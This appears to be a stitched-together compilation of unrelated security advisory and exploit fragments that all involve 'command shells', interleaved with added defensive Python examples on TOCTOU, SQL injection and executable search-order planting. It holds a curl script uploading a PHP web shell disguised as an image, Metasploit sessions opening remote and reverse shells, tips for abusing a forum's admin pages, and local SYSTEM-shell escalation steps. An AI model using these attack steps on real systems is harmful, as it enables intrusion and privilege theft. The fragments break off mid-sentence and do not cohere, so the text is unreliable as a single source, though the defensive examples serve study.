Command shell
"user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" \
"$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" \
"$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F \
"max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null |
grep _thumb.jpg | egrep -o "[0-9]{4}"`
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
MD5: B5402A1EC8D04130304EBA89AF843916
The service provides functionality for any user to generate a diagnostic
report in order to aid in product troubleshooting. During report
generation, STEngine attempts to execute various scripts by spawning
command shells to gather system information. These scripts are
dynamically generated in a directory which all users may write to.
STEngine will also attempt to locate a command shell in this directory
and execute it if it is found. If a malicious local user places a
binary named "cmd.exe" in this directory, STEngine will execute it with
(e.g. Wireless Assistant, Help and Support Center, ...)
The first problem is that the path variable passed as an argument to the LaunchApp() method
does not distinguish between the global disk area and the local HP software area.
Using this method, one is therefore able to launch ANY executable binary on the system
within the logged-on user's context.
Combining this method with the system command shell, one can execute any sequence of shell commands
within the remote user's context (e.g. format, del, copy ...) by passing the '/c' switch as the first parameter
to cmd.exe (the "execute and exit" option).
At this point, having command execution via the shell, access to the CreateProcess() Win32 API function
and access to the system directory, we can construct an armed remote code execution exploit.
PulseAudio binary. After this it can execute this binary through the
hard link. At this moment /proc/self/exe will point to the hard link.
Before PulseAudio is restarted, the attacker can replace the hard link
with a different (executable) file or a (symbolic) link. When PulseAudio
restarts, it uses a path name that now points to a different file, for
example a command shell. Root privileges are not dropped while PulseAudio
reloads, thus allowing a local attacker to gain root privileges.
Please note, this attack is only possible if the attacker can create
hard links on the same hard disk partition on which PulseAudio is
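The swap described above is a time-of-check/time-of-use problem on a remembered path name. The following added example (not PulseAudio's code) reproduces it on ordinary files in a temporary directory: a hard link to the "daemon" file is created, its path is remembered for the restart, and the link is then replaced with a symlink to a different file. It also shows the check a daemon can make before re-executing by path: compare the device/inode pair recorded at first exec with what the path names now. File names and contents are constructed.

```python
"""Stale path name on re-exec, and a dev/inode check against it.  Added
example, not PulseAudio's code; all files below are constructed."""
import os
import tempfile


def snapshot(path: str) -> tuple:
    """Identity of the file currently behind `path`: (device, inode)."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)


def safe_to_reexec(path: str, first_exec: tuple) -> bool:
    """Only re-execute if `path` still names the same file as at first exec."""
    try:
        return snapshot(path) == first_exec
    except OSError:
        return False


def demo() -> dict:
    tmp = tempfile.mkdtemp()
    daemon = os.path.join(tmp, "pulseaudio")   # stands in for the setuid binary
    shell = os.path.join(tmp, "sh")            # what the attacker wants run
    link = os.path.join(tmp, "link")           # attacker's hard link, same fs
    with open(daemon, "w") as f:
        f.write("#!real daemon\n")
    with open(shell, "w") as f:
        f.write("#!command shell\n")
    os.link(daemon, link)
    # First start: the daemon was executed via the link, so the path it
    # remembers (what readlink(/proc/self/exe) returns) is the link path.
    remembered_path = link
    first_exec = snapshot(remembered_path)
    # Before the restart the attacker swaps the hard link for a symlink.
    os.remove(link)
    os.symlink(shell, link)
    with open(remembered_path) as f:
        now_runs = f.read()
    return {
        "same_inode": safe_to_reexec(remembered_path, first_exec),
        "path_now_contains": now_runs.strip(),
        "blind_reexec_would_run_shell": now_runs.startswith("#!command shell"),
    }


if __name__ == "__main__":
    print(demo())
    # {'same_inode': False, 'path_now_contains': '#!command shell',
    #  'blind_reexec_would_run_shell': True}
```

Keeping an open descriptor on the original binary and re-executing through it (os.fexecve / fexecve(3)) avoids the path lookup entirely, and on Linux 3.6 and later the fs.protected_hardlinks sysctl stops an unprivileged user from creating the initial hard link to a root-owned binary.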
$query = "SELECT * FROM admin_users WHERE email = '$email' AND password = '$password'";
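The query above concatenates user input straight into the SQL text, so a value that closes the quote can rewrite the WHERE clause. As an added example (not code from the advisory), the block below mirrors that line with Python string formatting against an in-memory SQLite table and shows the bypass, then the same lookup with bound parameters. The admin_users table, its one row and the attacker input are constructed.

```python
"""String-built login query versus a parameterised one.  Added example,
not the advisory's code; table contents and attacker input are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed admin_users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO admin_users VALUES (1, 'admin@example.invalid', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, email: str, password: str) -> list:
    """Builds the query by interpolation, exactly the bug in the quoted PHP line."""
    query = ("SELECT * FROM admin_users WHERE email = '%s' AND password = '%s'"
             % (email, password))
    return conn.execute(query).fetchall()


def login_safe(conn, email: str, password: str) -> list:
    """Same query with bound parameters: the input is data, never SQL."""
    query = "SELECT * FROM admin_users WHERE email = ? AND password = ?"
    return conn.execute(query, (email, password)).fetchall()


# Constructed attacker input: closes the quote, ORs in a true condition and
# comments out the password clause ("-- " starts a comment in SQLite and MySQL).
INJECTED_EMAIL = "' OR 1=1 -- "


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_rows": len(login_vulnerable(conn, INJECTED_EMAIL, "wrong")),
        "safe_rows": len(login_safe(conn, INJECTED_EMAIL, "wrong")),
        "legit_rows": len(login_safe(conn, "admin@example.invalid", "s3cret")),
    }


if __name__ == "__main__":
    print(demo())   # {'vulnerable_rows': 1, 'safe_rows': 0, 'legit_rows': 1}
```

The vulnerable branch executes `SELECT * FROM admin_users WHERE email = '' OR 1=1 -- ' AND password = 'wrong'`, which returns the admin row without a password; the parameterised branch treats the whole string as a literal email and returns nothing.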
Other Avenues for Attack:
-------------------------
++ Turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a php command shell as an attachment to a post ;)
++ Query MySQL database via /ubbthreads/admin/dbcommand.php?Cat=
++ Get MySQL username/password (it is plaintext) - view HTML Source of /ubbthreads/admin/editconfig.php?Cat=
PR_ATTACH_LONG_PATHNAME MAPI property.
Setting PR_ATTACH_PATHNAME to cmd.exe causes Outlook to search the PATH
environment variable for an executable named cmd.exe. If such a file is
found, it is executed; normally this results in a command shell. The path
name can be set to anything that Windows supports, including UNC names
(e.g. \\servername\sharename\executable.exe) but also URLs (e.g.
http://www.akitasecurity.nl/advisory/RunCalc.exe). For URLs, Outlook
will open the default web browser. For other types of URIs, the
registered protocol handler determines how the supplied URI is opened
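Both the STEngine report generator and the Outlook PR_ATTACH_PATHNAME case above come down to the same mistake: the program names "cmd.exe" without a path and lets a directory search decide which file runs, so any writable directory searched before the real one is a planting point. The block below is an added example (not Symantec's or Microsoft's code) that audits a search order for such directories and shows the shadowing happen. The directory layout, the "ACL" and the search order are constructed in a temporary directory; on Windows the real order is the application directory, the current directory, the system directories and then each PATH entry, and the writability check would read the DACL (e.g. with icacls) rather than a set.

```python
"""Search-order planting check for a bare executable name.  Added example,
not code from the advisories above; layout and ACL are constructed."""
import os
import tempfile
from typing import Callable, List, Optional


def resolve(name: str, search_dirs: List[str]) -> Optional[str]:
    """First <dir>/<name> that exists, as a search-based loader picks it."""
    for d in search_dirs:
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate):
            return candidate
    return None


def planting_points(name: str, search_dirs: List[str],
                    is_writable: Callable[[str], bool]) -> List[str]:
    """Writable directories searched before the first existing copy of
    `name`.  A binary dropped in any of them shadows the real one; if no
    copy exists at all, every writable directory in the order qualifies."""
    points = []
    for d in search_dirs:
        if os.path.isfile(os.path.join(d, name)):
            break
        if os.path.isdir(d) and is_writable(d):
            points.append(d)
    return points


def demo() -> dict:
    root = tempfile.mkdtemp()
    scripts = os.path.join(root, "scripts")    # world-writable report/script dir
    system = os.path.join(root, "system32")    # protected dir with the real cmd.exe
    os.makedirs(scripts)
    os.makedirs(system)
    with open(os.path.join(system, "cmd.exe"), "w") as f:
        f.write("real shell")
    writable = {scripts}                        # constructed ACL: only scripts is writable
    order = [scripts, system]                   # constructed search order
    before = resolve("cmd.exe", order)
    points = planting_points("cmd.exe", order, lambda d: d in writable)
    with open(os.path.join(points[0], "cmd.exe"), "w") as f:   # the attack
        f.write("planted shell")
    after = resolve("cmd.exe", order)
    fixed = os.path.join(system, "cmd.exe")     # the fix: absolute path, no search
    with open(fixed) as f:
        still_real = f.read() == "real shell"
    return {
        "before": os.path.basename(os.path.dirname(before)),
        "planting_points": [os.path.basename(p) for p in points],
        "after": os.path.basename(os.path.dirname(after)),
        "absolute_path_unaffected": still_real,
    }


if __name__ == "__main__":
    print(demo())
    # {'before': 'system32', 'planting_points': ['scripts'], 'after': 'scripts',
    #  'absolute_path_unaffected': True}
```

Run against a real host, the search order for a service is the list to audit, and any entry that unprivileged users can write to and that precedes the system directory is a finding; the fix on the program side is to build the full path from GetSystemDirectory() and pass it as lpApplicationName to CreateProcess, so no search takes place.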
CiscoWorks IPM is a troubleshooting application that gauges network
response time and availability. It is available as a component within
the CiscoWorks LAN Management Solution (LMS) bundle. IPM version 2.6
for Solaris and Windows contains a process that causes a command
shell to automatically be bound to a randomly selected TCP port.
Remote, unauthenticated users are able to connect to the open port
and execute arbitrary commands with casuser privileges on Solaris
systems and with SYSTEM privileges on Windows systems. This
vulnerability is documented in CVE-2008-1157 and Cisco Bug ID
CSCsj06260.
dropped when accessing the GSC properties from the System Tray applet.
The vulnerability can be exploited by right-clicking the System Tray
icon, choosing "Log", then right-clicking "Event Viewer" and choosing
"Open Log File...". The resulting file-open dialog can be abused by
navigating to C:\WINDOWS\SYSTEM32\, right-clicking cmd.exe, then
selecting "Open"; doing so spawns a command shell with SYSTEM privileges.
Proof of concept:
-----------------
msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit
[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 -> 192.168.198.151:42239) at 2010-11-15 23:50:35 -0600
id
uid=520(soggycat) gid=99(nobody) groups=99(nobody)